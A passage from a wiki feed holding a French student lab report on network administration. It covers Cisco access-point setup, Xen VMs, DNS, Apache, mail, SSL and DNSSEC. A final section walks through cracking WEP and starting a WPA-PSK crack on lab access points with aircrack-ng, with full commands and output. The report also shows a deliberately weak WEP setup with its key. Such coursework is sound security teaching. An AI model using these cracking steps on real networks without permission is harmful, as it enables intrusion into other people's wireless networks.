<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="fr">
		<id>https://wiki-ima.plil.fr/mediawiki//api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Jturut</id>
		<title>Wiki d'activités IMA - Contributions de l’utilisateur [fr]</title>
		<link rel="self" type="application/atom+xml" href="https://wiki-ima.plil.fr/mediawiki//api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Jturut"/>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php/Sp%C3%A9cial:Contributions/Jturut"/>
		<updated>2026-04-24T15:56:14Z</updated>
		<subtitle>Contributions de l’utilisateur</subtitle>
		<generator>MediaWiki 1.29.2</generator>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35665</id>
		<title>TP sysres IMA2a5 2016/2017 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35665"/>
				<updated>2016-12-06T11:38:04Z</updated>
		
		<summary type="html">&lt;p&gt;Jturut : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;TABLE BORDER=&amp;quot;1&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;CAPTION&amp;gt; Récapitulatif des IP &amp;lt;/CAPTION&amp;gt; &lt;br /&gt;
  &amp;lt;TR&amp;gt; &lt;br /&gt;
 &amp;lt;TH&amp;gt; N° VLAN &amp;lt;/TH&amp;gt; &lt;br /&gt;
 &amp;lt;TH&amp;gt; Prénom &amp;lt;/TH&amp;gt; &lt;br /&gt;
 &amp;lt;TH&amp;gt; Réseau local &amp;lt;/TH&amp;gt; &lt;br /&gt;
 &amp;lt;TH&amp;gt; Nom VM &amp;lt;/TH&amp;gt; &lt;br /&gt;
 &amp;lt;TH&amp;gt; @IP VM &amp;lt;/TH&amp;gt;&lt;br /&gt;
  &amp;lt;/TR&amp;gt;&lt;br /&gt;
  &amp;lt;TR&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; VLAN20 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Dimitri &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; 10.60.20.0/24 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Vald &amp;lt;/TD&amp;gt;&lt;br /&gt;
 &amp;lt;TD&amp;gt; 193.48.57.182/28 &amp;lt;/TD&amp;gt; &lt;br /&gt;
  &amp;lt;/TR&amp;gt; &lt;br /&gt;
  &amp;lt;TR&amp;gt;&lt;br /&gt;
 &amp;lt;TD&amp;gt; VLAN21 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Nabil &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; 10.60.21.0/24 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Pnl &amp;lt;/TD&amp;gt;&lt;br /&gt;
 &amp;lt;TD&amp;gt; 193.48.57.177/28 &amp;lt;/TD&amp;gt; &lt;br /&gt;
  &amp;lt;/TR&amp;gt;&lt;br /&gt;
  &amp;lt;TR&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; VLAN22 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Otmane &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; 10.60.22.0/24 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Lartiste &amp;lt;/TD&amp;gt;&lt;br /&gt;
 &amp;lt;TD&amp;gt; 193.48.57.178/28 &amp;lt;/TD&amp;gt; &lt;br /&gt;
  &amp;lt;/TR&amp;gt;&lt;br /&gt;
  &amp;lt;TR&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; VLAN23 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Hugo &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; 10.60.23.0/24 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Gradur &amp;lt;/TD&amp;gt;&lt;br /&gt;
 &amp;lt;TD&amp;gt; 193.48.57.179/28 &amp;lt;/TD&amp;gt; &lt;br /&gt;
  &amp;lt;/TR&amp;gt; &lt;br /&gt;
 &amp;lt;TR&amp;gt;&lt;br /&gt;
 &amp;lt;TD&amp;gt; VLAN24 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Clement &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; 10.60.24.0/24 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Gringe &amp;lt;/TD&amp;gt;&lt;br /&gt;
 &amp;lt;TD&amp;gt; 193.48.57.180/28 &amp;lt;/TD&amp;gt; &lt;br /&gt;
  &amp;lt;/TR&amp;gt; &lt;br /&gt;
 &amp;lt;TR&amp;gt;&lt;br /&gt;
 &amp;lt;TD&amp;gt; VLAN25 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Joan &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; 10.60.25.0/24 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Orelsan &amp;lt;/TD&amp;gt;&lt;br /&gt;
 &amp;lt;TD&amp;gt; 193.48.57.181/28 &amp;lt;/TD&amp;gt; &lt;br /&gt;
  &amp;lt;/TR&amp;gt; &lt;br /&gt;
&amp;lt;/TABLE&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accès Cisco ==&lt;br /&gt;
&lt;br /&gt;
On vient dans un premier temps brancher le point d'accès Cisco et à l'aide de la commande ci-dessous, on trouve sur quel port USB se trouve notre point d'accès&lt;br /&gt;
&amp;lt;pre&amp;gt;dmesg | grep tty&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour configurer notre Cisco, on utilise &amp;lt;i&amp;gt;minicom -os&amp;lt;/i&amp;gt; et pour cela nous devons être en root&lt;br /&gt;
&lt;br /&gt;
Une fois minicom lancé, on vient changer les paramètres de notre Cisco&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;A - Serial Device           : /dev/ttyUSB0&lt;br /&gt;
B - Lockfile Location       : /var/lock &lt;br /&gt;
C - Callin Program          :&lt;br /&gt;
D - Callout Program         :&lt;br /&gt;
E - Bps/Par/Bits            : 9600 8N1&lt;br /&gt;
F - Hardware Flow Control   : No&lt;br /&gt;
G - Software Flow Control   : No&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
On se connecte en admin sur le Cisco &lt;br /&gt;
&amp;lt;Pre&amp;gt;enable&lt;br /&gt;
config terminal&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Configuration du SSID&lt;br /&gt;
&amp;lt;pre&amp;gt;dot11 ssid MAMENE&lt;br /&gt;
authentication open&lt;br /&gt;
guest-mode&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Configuraiton de l'interface Dot11Radio0&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
interface Dot11Radio0&lt;br /&gt;
encryption key 1 size 40bit 7 A3C2590B73A0 transmit-key&lt;br /&gt;
encryption mode wep mandatory&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour permettre l'accès à notre Cisco par adresse mac, on va chercher l'adresse mac des ordinateurs et venir les ajouter dans la liste d'accès de notre point d'accès&lt;br /&gt;
&amp;lt;pre&amp;gt;access-list 701 permit 5cb9.0180.a039   0000.0000.0000&lt;br /&gt;
access-list 701 permit 3ca8.2a7a.05c5   0000.0000.0000&lt;br /&gt;
access-list 701 permit 7429.aff3.fd91   0000.0000.0000&lt;br /&gt;
access-list 701 permit 5cb9.0180.a139   0000.0000.0000&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Installation d'une machine virtuelle ==&lt;br /&gt;
L'installation s'effectuée à l'aide du logiciel de virtualisation Xen. Nous ne possédons qu'un seul serveur pour 6. C'est pour cela qu'on passe par la création d'une machine virtuelle pour que chacun puisse réaliser un serveur DNS, Apache sur sa machine virtuelle.&lt;br /&gt;
Pour créer la machine virtuelle, on tape la commande suivante :&lt;br /&gt;
&amp;lt;pre&amp;gt; xen-create-image --hostname Orelsan --ip 193.48.57.181 --netmask 255.255.255.240 --dir /usr/local/xen&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Entre deux séances de TP, nous avons eu un changement de version du kernel Linux. De ce fait il a fallu modifier le fichier &amp;lt;i&amp;gt;orelsan.cfg&amp;lt;/i&amp;gt; en remplaçant la version 3.14 en 3.16.0 &lt;br /&gt;
&amp;lt;pre&amp;gt; kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
 extra       = 'elevator=noop'&lt;br /&gt;
 ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Lancement de notre machine virtuelle &lt;br /&gt;
&amp;lt;pre&amp;gt; xl create Orelsan.cvg &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Connexion à notre machine virtuelle&lt;br /&gt;
&amp;lt;pre&amp;gt; xl console Orelsan &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut également voir la liste de toutes les machines virtuelles ouvertes avec :&lt;br /&gt;
&amp;lt;pre&amp;gt; xl list &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois la connexion sur notre machine établie, nous devons changer le fichier &amp;lt;i&amp;gt;interfaces&amp;lt;/i&amp;gt; pour permettre une connexion à internet:&lt;br /&gt;
&amp;lt;pre&amp;gt;# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# The primary network interface&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
        address 193.48.57.181&lt;br /&gt;
        netmask 255.255.255.240&lt;br /&gt;
        gateway 193.48.57.190&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis pour prendre en compte ses modifications nous utilisons :&lt;br /&gt;
&amp;lt;pre&amp;gt;ifdown&lt;br /&gt;
ifup&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après un reboot de notre machine virtuelle, nous pouvons ainsi installer différents packages comme :&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install vim &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du service internet ==&lt;br /&gt;
Pour cela, il nous faut réaliser un serveur DNS qui permet de lier un nom de domaine à une adresse IP. Ainsi qu'un serveur Apache qui est un serveur HTTP&lt;br /&gt;
&lt;br /&gt;
=== Installation du serveur HTTP ===&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install apache2 &amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Installation du serveur DNS ===&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install bind9 &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Si cette installation vous indique une erreur, il faut modifier le fichier  &amp;lt;i&amp;gt;/etc/apt/apt.conf.d/01proxy&amp;lt;/i&amp;gt;&lt;br /&gt;
et remplacer &lt;br /&gt;
&amp;lt;pre&amp;gt; Acquire::http::Proxy &amp;quot;http://proxy.polytech-lille.fr:3128&amp;quot;; &amp;lt;/pre&amp;gt;&lt;br /&gt;
par&lt;br /&gt;
&amp;lt;pre&amp;gt; Acquire::http::Proxy &amp;quot;http://helfaut.escaut.net:3128&amp;quot;; &amp;lt;/pre&amp;gt;&lt;br /&gt;
Cette modification est dû à la modification du proxy de l'école.&lt;br /&gt;
&lt;br /&gt;
===Configuration de notre nom de domaine===&lt;br /&gt;
&lt;br /&gt;
Après l'achat de notre nom de domaine &amp;lt;i&amp;gt;orelsan.website&amp;lt;/i&amp;gt; sur www.gandi.net on vient modifier le glue records pour lier notre adresse IP au nom de domaine&lt;br /&gt;
dns.orelsan.webiste -&amp;gt; 193.48.57.181&lt;br /&gt;
Ensuite on se rend dans l'onglet modifier les DNS et on change le DNS indiquer par celui vu juste précédemment.&lt;br /&gt;
Puis nous allons modifier 3 fichiers :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/named.conf.options&amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;options {&lt;br /&gt;
   allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
   217.70.177.40/32 ; //passerelle de gandi  par defaut&lt;br /&gt;
 };&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/named.conf.local &amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;//&lt;br /&gt;
// Do any local configuration here&lt;br /&gt;
//&lt;br /&gt;
&lt;br /&gt;
// Consider adding the 1918 zones here, if they are not used in your&lt;br /&gt;
// organization&lt;br /&gt;
//include &amp;quot;/etc/bind/zones.rfc1918&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;orelsan.website&amp;quot; {&lt;br /&gt;
   type master;&lt;br /&gt;
   file &amp;quot;/etc/bind/orelsan.website/orelsan&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/orelsan.website/orelsan&amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;$TTL 259200&lt;br /&gt;
@ IN SOA dns postmaster.orelsan.website. (&lt;br /&gt;
        20               ; Version&lt;br /&gt;
        7200             ; Refresh (2h)&lt;br /&gt;
        3600             ; Retry   (1h)&lt;br /&gt;
        1209600          ; Expire (14j)&lt;br /&gt;
        259200 )         ; Minimum TTL (3j)&lt;br /&gt;
         IN NS dns&lt;br /&gt;
         IN NS ns6.gandi.net.&lt;br /&gt;
         IN A       193.48.57.181&lt;br /&gt;
         IN MX      100 dns&lt;br /&gt;
&lt;br /&gt;
dns     IN A       193.48.57.181&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour prendre en compte les paramètres changés dans les fichiers ci-dessous, il suffit d'effectuer les commandes:&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 stop&lt;br /&gt;
service bind9 start&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour observer le bon fonctionnement de notre serveur, on peut visualiser les informations sur&lt;br /&gt;
&lt;br /&gt;
&amp;lt;i&amp;gt;cat /var/log/daemon.log&amp;lt;/i&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis un ping de notre page internet peut nous montrer également son bon fonctionnement&lt;br /&gt;
Si tout cela fonctionne on peut se rendre sur notre page.&lt;br /&gt;
Pour modifier les informations visibles sur la page, il suffit d'aller dans &lt;br /&gt;
&amp;lt;i&amp;gt;/var/www/html/index.html&amp;lt;/i&amp;gt;. Toutes les informations écrites dans ce fichier seront visible sur notre page.&lt;br /&gt;
&lt;br /&gt;
===Installation boite mail===&lt;br /&gt;
&lt;br /&gt;
On commence par installer postfix qui est un serveur de messagerie électronique.&lt;br /&gt;
&amp;lt;pre&amp;gt;apt-get install postfix&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois postfix installé, on indique le nom de domaine (orelsan.website) dans la configuration&lt;br /&gt;
&lt;br /&gt;
Dans &amp;lt;i&amp;gt;/etc/aliases&amp;lt;/i&amp;gt; on ajoute:&lt;br /&gt;
&amp;lt;pre&amp;gt;admin:root&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis on utilise la commande&lt;br /&gt;
&amp;lt;pre&amp;gt;newaliases&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On installe également bsd-mailx qui est un agent de courriel utilisateur simple.&lt;br /&gt;
&amp;lt;pre&amp;gt;apt-get install bsd-mailx&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Et pour observer nos mails, on tape la commande &amp;lt;i&amp;gt;mail&amp;lt;/i&amp;gt; dans la console.&lt;br /&gt;
L'adresse mail est admin@orelsan.website.&lt;br /&gt;
&lt;br /&gt;
===Générer une demande de certificat en SHA 2===&lt;br /&gt;
&amp;lt;pre&amp;gt;openssl req -nodes -newkey rsa:2048 -sha256 -keyout monserveur.key -out serveur.csr&lt;br /&gt;
&lt;br /&gt;
Country Name (2 letter code) [AU]:fr&lt;br /&gt;
State or Province Name (full name) [Some-State]:North&lt;br /&gt;
Locality Name (eg, city) []:Lille&lt;br /&gt;
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Polytech&lt;br /&gt;
Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
Common Name (e.g. server FQDN or YOUR name) []:orelsan.website&lt;br /&gt;
Email Address []:admin@orelsan.website&lt;br /&gt;
&lt;br /&gt;
Please enter the following 'extra' attributes&lt;br /&gt;
to be sent with your certificate request&lt;br /&gt;
A challenge password []:&lt;br /&gt;
An optional company name []:&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Cette fonction nous crée 2 fichiers :&lt;br /&gt;
monserveur.key	serveur.csr&lt;br /&gt;
&lt;br /&gt;
-monserveur.key contient la clé privée.&lt;br /&gt;
&lt;br /&gt;
-serveur.csr contient la clé public.&lt;br /&gt;
&lt;br /&gt;
On va maintenant ajouter la clé public sur gandi pour qu'il nous génère un certificat.&lt;br /&gt;
On crée 2 fichier avec :&lt;br /&gt;
&lt;br /&gt;
-inter.crt qui contient le certificat intermédiaire.&lt;br /&gt;
&lt;br /&gt;
-gandi.crt qui qui contient le certificat.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Orelsan:~# ls&lt;br /&gt;
gandi.crt  inter.crt  mbox  monserveur.key  serveur.csr&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans le fichier &amp;lt;i&amp;gt;/etc/apache2/sites-enabled/000-default.conf&amp;lt;/i&amp;gt; on écrit: &lt;br /&gt;
&amp;lt;pre&amp;gt;&amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
&lt;br /&gt;
        ServerName www.orelsan.website&lt;br /&gt;
        ServerAlias orelsan.website&lt;br /&gt;
        DocumentRoot /var/www/html&lt;br /&gt;
        CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
&lt;br /&gt;
        SSLEngine on&lt;br /&gt;
	SLCertificateFile /root/gandi.crt&lt;br /&gt;
        SSLCertificateKeyFile /root/monserveur.key&lt;br /&gt;
        SSLCertificateChainFile /root/inter.crt&lt;br /&gt;
	SSLVerifyClient None&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== DNSSEC ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous ajoutons l'option ci-dessous dans le fichier &amp;lt;i&amp;gt;named.conf.options&amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-enable yes &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans un répertoire, nous créons d'abord la clé asymétrique de signature puis celle de zone :&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE orelsan.website &lt;br /&gt;
dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE orelsan.website&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après avoir renommé les noms de nos clés, nous ajoutons dans notre fichier de zone &lt;br /&gt;
&amp;lt;pre&amp;gt;$include /etc/bind/orelsan.website.dnssec/orelsan.website-ksk.key&lt;br /&gt;
$include /etc/bind/orelsan.website.dnssec/orelsan.website-zsk.key &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
et pour signer les enregistrements de la zone, nous utilisons la commande :&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-signzone -o orelsan.website -k orelsan.website-ksk ../orelsan.website/orelsan orelsan.website-zsk&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Cassage clé ==&lt;br /&gt;
Pour le crackage de clé, nous allons utiliser le package aircrack-ng qui est un ensemble d'outils permettant de tester la sécurité d'un réseau&lt;br /&gt;
=== Cassage de clé WEP ===&lt;br /&gt;
Commençons par detecter notre interface wifi par le biais d'un&lt;br /&gt;
&amp;lt;pre&amp;gt;ifconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
ou&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notre interface est wlan2 qui correspond à la clé wifi ajoutée sur l'ordinateur.&lt;br /&gt;
&lt;br /&gt;
Nous pouvons ainsi commencer à utiliser les outils de aircrack en debutant par &lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng start wlan2 &amp;lt;/pre&amp;gt;&lt;br /&gt;
Cette commande permet de mettre en mode moniteur notre interface wifi&lt;br /&gt;
Si tout se passe correctement, vous allez voir apparaitre&lt;br /&gt;
&amp;lt;pre&amp;gt;creation du mon0&lt;br /&gt;
&lt;br /&gt;
Interface	Chipset		Driver&lt;br /&gt;
&lt;br /&gt;
mon0		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
wlan0		Broadcom	wl - [phy0]&lt;br /&gt;
wlan2		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
				(monitor mode enabled on mon1)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous observons bien que le mode moniteur est activé pour notre wlan2.&lt;br /&gt;
&lt;br /&gt;
Nous pouvons observer tous les réseaux grâce à la commande &lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng wlan2&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois que nous avons repéré  la cracotte que nous voulons cracker on refait un airodump pour se focaliser sur cette cracotte&lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng  wlan2 -c 8 -essid cracotte03 --bssid 04:DA:D2:9C:50:52 -w crack&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
-c permet de le selectrionner le channel de communication&lt;br /&gt;
-w le nom du fichier dans lequel airodump va enregistrer les données&lt;br /&gt;
--bssid permet d'indiquer l'adresse mac de la cible &lt;br /&gt;
--essid permet d'indique le ssid de la cible (nom du réseau)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;CH  8 ][ Elapsed: 1 min ][ 2016-11-21 15:08                                         &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 04:DA:D2:9C:50:52  -41  45      799    53316  506   8  54e. WEP  WEP         cracotte03                                             &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                           &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 04:DA:D2:9C:50:52  00:0F:B5:92:23:6A  -28   54e-54e   222    60221&amp;lt;/pre&amp;gt;  &lt;br /&gt;
&lt;br /&gt;
On peut visualiser le nombre de paquets qui transit. &lt;br /&gt;
Pour permettre le crackage de la clé WEP, un nombre de data important est nécessaire. Pour obtenir plus de data, nous pouvons utiliser la commande aireplay dans un autre terminal.&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Piranha:/home/pifou#aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52 wlan2&lt;br /&gt;
No source MAC (-h) specified. Using the device MAC (40:A5:EF:05:AA:25)&lt;br /&gt;
15:00:01  Waiting for beacon frame (BSSID: 04:DA:D2:9C:50:51) on channel 8&lt;br /&gt;
&lt;br /&gt;
15:00:01  Sending Authentication Request (Open System)&lt;br /&gt;
&lt;br /&gt;
15:00:03  Sending Authentication Request (Open System)&lt;br /&gt;
&lt;br /&gt;
15:00:05  Sending Authentication Request (Open System) [ACK]&lt;br /&gt;
15:00:05  Authentication successful&lt;br /&gt;
15:00:05  Sending Association Request [ACK]&lt;br /&gt;
15:00:05  Association successful :-) (AID: 1) &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Et tout en laissant airodump ouvert sur un terminal, on vient trouver la clé WEP en utilisant la commande ci-dessous dans un autre terminal&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Piranha:/home/pifou#aircrack-ng crack.cap &lt;br /&gt;
                                                            Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                                            [00:00:39] Tested 257766 keys (got 32866 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   EE(46080) B9(39936) 70(39680) B2(39168) 86(38656) 11(38400) B4(38400) F2(38400) A1(38144) 24(37632) &lt;br /&gt;
    1    0/  1   EE(45824) 11(44544) 7B(42240) 05(40960) 93(40448) C4(40448) EE(40448) 1C(39168) 3E(39168) 42(38912) &lt;br /&gt;
    2    0/  1   EE(45568) 36(42240) 6A(42240) 0D(40192) DC(39680) 98(39424) F3(39424) 39(39168) 3E(38912) B6(38656) &lt;br /&gt;
    3    0/  1   EE(48640) 11(43520) 61(40448) E6(40448) 00(38912) 9C(38656) EF(38656) 30(38400) B7(38400) 2A(38144) &lt;br /&gt;
    4    0/  1   EE(42240) 77(40960) AA(39936) 86(39424) F2(39168) FE(39168) 95(38912) 69(38656) 73(38656) AF(38656) &lt;br /&gt;
    5    1/  2   EE(42752) A2(41728) 34(41216) 46(40448) 0B(39680) 50(39424) 6C(39168) BA(39168) 7D(38912) 66(38656) &lt;br /&gt;
    6    0/  1   EE(44032) 8D(43264) 9F(40960) A0(40960) 74(40704) 17(40448) 91(39936) 66(39424) 5A(39168) C4(38912) &lt;br /&gt;
    7    0/  1   EE(44032) 36(40192) 4D(39680) 3D(39168) BF(39168) EC(38912) 9D(38656) EF(38656) A9(38400) B4(38144) &lt;br /&gt;
    8    0/  1   EE(48128) 35(40448) C1(39680) 9E(39424) F3(39424) C8(39168) 36(38656) 2E(38144) 7A(38144) C5(38144) &lt;br /&gt;
    9    0/  1   EE(45312) 74(42496) E7(40960) 6C(40192) 28(39936) 1B(39680) AF(39680) 71(38656) 44(38400) 2C(37888) &lt;br /&gt;
   10    3/  1   62(39424) BC(39424) 48(39168) 56(38912) AF(38912) 23(38400) 98(38400) A7(38144) 2B(37888) 79(37888) &lt;br /&gt;
   11    5/  1   68(38656) E9(38656) F9(38656) 1E(38400) 36(38400) 5A(38144) 92(38144) 5C(37888) 87(37888) CB(37888) &lt;br /&gt;
   12    0/  2   79(40780) 62(40380) 4D(40156) 85(39388) DE(39280) 4E(39060) 98(38876) A7(38544) 6A(38432) 82(38144) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:E4:44 ] &lt;br /&gt;
	Decrypted correctly: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clé WPA-PSK ===&lt;br /&gt;
Le cassage de clé WPA est légèrement diffèrent de celui WEP. Nous utilisons les mêmes outils (aircrack-ng) mais nous devons fournir un dictionnaire avec tous les mots de passe. Dans notre cas, nous avons décidé de prendre une clé de 8 chiffres. &lt;br /&gt;
Nous utilisons pour commencer&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng start wlan2 &amp;lt;/pre&amp;gt;&lt;br /&gt;
Puis&lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng --encrypt wpa mon0 -c 6 -w Poney --bssid 30:5A:3A:15:F6:3F&amp;lt;/pre&amp;gt;&lt;br /&gt;
--encrypt permet de sélectionner le type d'encryption souhaité.&lt;br /&gt;
&amp;lt;pre&amp;gt; CH  6 ][ Elapsed: 2 mins ][ 2016-11-21 16:18 ][ WPA handshake: 30:5A:3A:15:F6:3F                                         &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 30:5A:3A:15:F6:3F  -34 100      738     1323   26   6  54e  WPA2 CCMP   PSK  Poneyus                                                &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                           &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 30:5A:3A:15:F6:3F  74:29:AF:F3:FD:91  -16    1e- 1     75      265                                                                   &lt;br /&gt;
